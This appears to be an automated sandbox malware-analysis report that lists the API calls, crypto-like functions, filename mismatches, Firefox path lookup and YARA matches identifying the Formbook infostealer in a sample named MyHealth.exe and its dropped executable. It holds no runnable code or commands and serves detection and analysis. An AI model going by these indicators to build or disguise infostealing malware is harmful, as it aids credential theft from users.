Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_1F40A3E0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A240 NtReadFile,LdrInitializeThunk,16_2_1F40A240
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A2D0 NtClose,LdrInitializeThunk,16_2_1F40A2D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A710 NtQuerySection,16_2_1F40A710
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A780 NtOpenDirectoryObject,16_2_1F40A780
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A650 NtQueueApcThread,16_2_1F40A650
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A6D0 NtCreateProcessEx,16_2_1F40A6D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40BD40 NtSuspendThread,16_2_1F40BD40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A520 NtEnumerateKey,16_2_1F40A520
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A5A0 NtWriteVirtualMemory,16_2_1F40A5A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A460 NtOpenProcess,16_2_1F40A460
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A470 NtSetInformationFile,16_2_1F40A470
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40B470 NtOpenThread,16_2_1F40B470
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40B410 NtOpenProcessToken,16_2_1F40B410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A430 NtQueryVirtualMemory,16_2_1F40A430
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40ACE0 NtCreateMutant,16_2_1F40ACE0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A350 NtQueryValueKey,16_2_1F40A350
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A370 NtQueryInformationProcess,16_2_1F40A370
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A310 NtEnumerateValueKey,16_2_1F40A310
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A3D0 NtCreateKey,16_2_1F40A3D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A260 NtWriteFile,16_2_1F40A260
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A220 NtWaitForSingleObject,16_2_1F40A220
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40BA30 NtSetContextThread,16_2_1F40BA30
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A2F0 NtQueryInformationFile,16_2_1F40A2F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40A800 NtSetValueKey,16_2_1F40A800
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F40B0B0 NtGetContextThread,16_2_1F40B0B0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F0084 NtSetInformationThread,16_2_004F0084
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F2A1D NtSetInformationThread,16_2_004F2A1D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F135E Sleep,NtProtectVirtualMemory,16_2_004F135E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F0BD0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,16_2_004F0BD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F0BAA CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,16_2_004F0BAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F25FD NtProtectVirtualMemory,16_2_004F25FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F13B3 LdrInitializeThunk,NtProtectVirtualMemory,16_2_004F13B3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_004F25DA NtProtectVirtualMemory,16_2_004F25DA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A750 NtCreateFile,LdrInitializeThunk,17_2_1F40A750
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A700 NtProtectVirtualMemory,LdrInitializeThunk,17_2_1F40A700
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A720 NtResumeThread,LdrInitializeThunk,17_2_1F40A720
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A610 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_1F40A610
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A6A0 NtCreateSection,LdrInitializeThunk,17_2_1F40A6A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A540 NtDelayExecution,LdrInitializeThunk,17_2_1F40A540
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A560 NtQuerySystemInformation,LdrInitializeThunk,17_2_1F40A560
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A5F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_1F40A5F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A410 NtQueryInformationToken,LdrInitializeThunk,17_2_1F40A410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A480 NtMapViewOfSection,LdrInitializeThunk,17_2_1F40A480
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A4A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_1F40A4A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A360 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_1F40A360
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A3E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_1F40A3E0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A240 NtReadFile,LdrInitializeThunk,17_2_1F40A240
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A2D0 NtClose,LdrInitializeThunk,17_2_1F40A2D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A710 NtQuerySection,17_2_1F40A710
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A780 NtOpenDirectoryObject,17_2_1F40A780
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A650 NtQueueApcThread,17_2_1F40A650
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A6D0 NtCreateProcessEx,17_2_1F40A6D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40BD40 NtSuspendThread,17_2_1F40BD40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A520 NtEnumerateKey,17_2_1F40A520
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A5A0 NtWriteVirtualMemory,17_2_1F40A5A0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A460 NtOpenProcess,17_2_1F40A460
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A470 NtSetInformationFile,17_2_1F40A470
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40B470 NtOpenThread,17_2_1F40B470
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40B410 NtOpenProcessToken,17_2_1F40B410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A430 NtQueryVirtualMemory,17_2_1F40A430
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40ACE0 NtCreateMutant,17_2_1F40ACE0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A350 NtQueryValueKey,17_2_1F40A350
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A370 NtQueryInformationProcess,17_2_1F40A370
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A310 NtEnumerateValueKey,17_2_1F40A310
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A3D0 NtCreateKey,17_2_1F40A3D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A260 NtWriteFile,17_2_1F40A260
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A220 NtWaitForSingleObject,17_2_1F40A220
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40BA30 NtSetContextThread,17_2_1F40BA30
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A2F0 NtQueryInformationFile,17_2_1F40A2F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40A800 NtSetValueKey,17_2_1F40A800
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F40B0B0 NtGetContextThread,17_2_1F40B0B0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F0084 NtSetInformationThread,17_2_004F0084
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F2A1D NtSetInformationThread,17_2_004F2A1D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F135E Sleep,NtProtectVirtualMemory,17_2_004F135E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F0BD0 RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,17_2_004F0BD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F0BAA CreateThread,TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,17_2_004F0BAA
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F25FD NtProtectVirtualMemory,17_2_004F25FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F13B3 LdrInitializeThunk,NtProtectVirtualMemory,17_2_004F13B3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_004F25DA NtProtectVirtualMemory,17_2_004F25DA
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000A408A2_3_000A408A
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000A52F22_3_000A52F2
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000A74602_3_000A7460
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_3_000A25C42_3_000A25C4
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F5C1FCE2_2_1F5C1FCE
Source: C:\Users\user\Desktop\MyHealth.exeCode function: 2_2_1F525E702_2_1F525E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F49174616_2_1F491746
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F491FCE16_2_1F491FCE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E579016_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48278216_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48CE6616_2_1F48CE66
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F661116_2_1F3F6611
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F5E7016_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4E6116_2_1F3F4E61
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E764016_2_1F3E7640
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4926F816_2_1F4926F8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F483E9616_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E153016_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3A952816_2_1F3A9528
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F49251916_2_1F492519
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481D1B16_2_1F481D1B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F46C53F16_2_1F46C53F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C0D4016_2_1F3C0D40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48D5D216_2_1F48D5D2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F47FDDB16_2_1F47FDDB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F471DE316_2_1F471DE3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48E58116_2_1F48E581
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F46E58A16_2_1F46E58A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E141016_2_1F3E1410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D740C16_2_1F3D740C
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F547E16_2_1F3F547E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F47F42B16_2_1F47F42B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48DCC516_2_1F48DCC5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4844EF16_2_1F4844EF
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F492C9A16_2_1F492C9A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F491C9F16_2_1F491C9F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48349016_2_1F483490
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3A331416_2_1F3A3314
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3EFB4016_2_1F3EFB40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4B9616_2_1F3F4B96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CEBE016_2_1F3CEBE0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F63C216_2_1F3F63C2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F523D16_2_1F3F523D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F480A0216_2_1F480A02
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F49E21416_2_1F49E214
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4A5B16_2_1F3F4A5B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E42B016_2_1F3E42B0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4922DD16_2_1F4922DD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F491A9916_2_1F491A99
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F711016_2_1F3F7110
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F41990616_2_1F419906
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F594B16_2_1F3F594B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4861DF16_2_1F4861DF
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4919E216_2_1F4919E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F618016_2_1F3F6180
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F49D9BE16_2_1F49D9BE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F002116_2_1F3F0021
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FE02016_2_1F3FE020
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F981016_2_1F3F9810
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F107016_2_1F3F1070
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48D01616_2_1F48D016
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4928E816_2_1F4928E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3DA08016_2_1F3DA080
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4718B616_2_1F4718B6
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F48CB16_2_1F3F48CB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F49174617_2_1F491746
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F491FCE17_2_1F491FCE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3E579017_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48278217_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48CE6617_2_1F48CE66
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F661117_2_1F3F6611
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F5E7017_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F4E6117_2_1F3F4E61
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3E764017_2_1F3E7640
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4926F817_2_1F4926F8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F483E9617_2_1F483E96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3E153017_2_1F3E1530
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3A952817_2_1F3A9528
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F49251917_2_1F492519
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F481D1B17_2_1F481D1B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F46C53F17_2_1F46C53F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3C0D4017_2_1F3C0D40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48D5D217_2_1F48D5D2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F47FDDB17_2_1F47FDDB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F471DE317_2_1F471DE3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48E58117_2_1F48E581
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F46E58A17_2_1F46E58A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3E141017_2_1F3E1410
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3D740C17_2_1F3D740C
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F547E17_2_1F3F547E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F47F42B17_2_1F47F42B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48DCC517_2_1F48DCC5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4844EF17_2_1F4844EF
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F492C9A17_2_1F492C9A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F491C9F17_2_1F491C9F
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48349017_2_1F483490
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3A331417_2_1F3A3314
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3EFB4017_2_1F3EFB40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F4B9617_2_1F3F4B96
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3CEBE017_2_1F3CEBE0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F63C217_2_1F3F63C2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F523D17_2_1F3F523D
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F480A0217_2_1F480A02
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F49E21417_2_1F49E214
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F4A5B17_2_1F3F4A5B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3E42B017_2_1F3E42B0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4922DD17_2_1F4922DD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F491A9917_2_1F491A99
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F711017_2_1F3F7110
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F41990617_2_1F419906
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F594B17_2_1F3F594B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4861DF17_2_1F4861DF
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4919E217_2_1F4919E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F618017_2_1F3F6180
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F49D9BE17_2_1F49D9BE
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F002117_2_1F3F0021
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3FE02017_2_1F3FE020
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F981017_2_1F3F9810
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F107017_2_1F3F1070
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F48D01617_2_1F48D016
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4928E817_2_1F4928E8
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3DA08017_2_1F3DA080
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F4718B617_2_1F4718B6
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 17_2_1F3F48CB17_2_1F3F48CB
Found potential string decryption / allocating functionsShow sources
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: String function: 1F444F10 appears 50 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: String function: 1F41DDE8 appears 86 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: String function: 1F455110 appears 76 times
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: String function: 1F3CB0E0 appears 352 times
Source: C:\Users\user\Desktop\MyHealth.exeCode function: String function: 000F63EC appears 62 times
PE file contains strange resourcesShow sources
Source: MyHealth.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version infoShow sources
Source: MyHealth.exe, 00000000.00000002.761370251.000000000040B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Source: MyHealth.exeBinary or memory string: OriginalFilename vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.831234894.0000000002460000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.831206989.0000000002450000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.838348050.000000001F5EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000002.829796744.0000000000183000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameWWAHost.exej% vs MyHealth.exe
Source: MyHealth.exe, 00000002.00000000.760838720.000000000040B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Source: MyHealth.exeBinary or memory string: OriginalFilenamePusanopdrtte7.exe vs MyHealth.exe
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Windows\SysWOW64\WWAHost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install DirectoryJump to behavior
Yara signature matchShow sources
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.1090820917.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1086202869.0000000000060000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.835867734.000000001F2A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
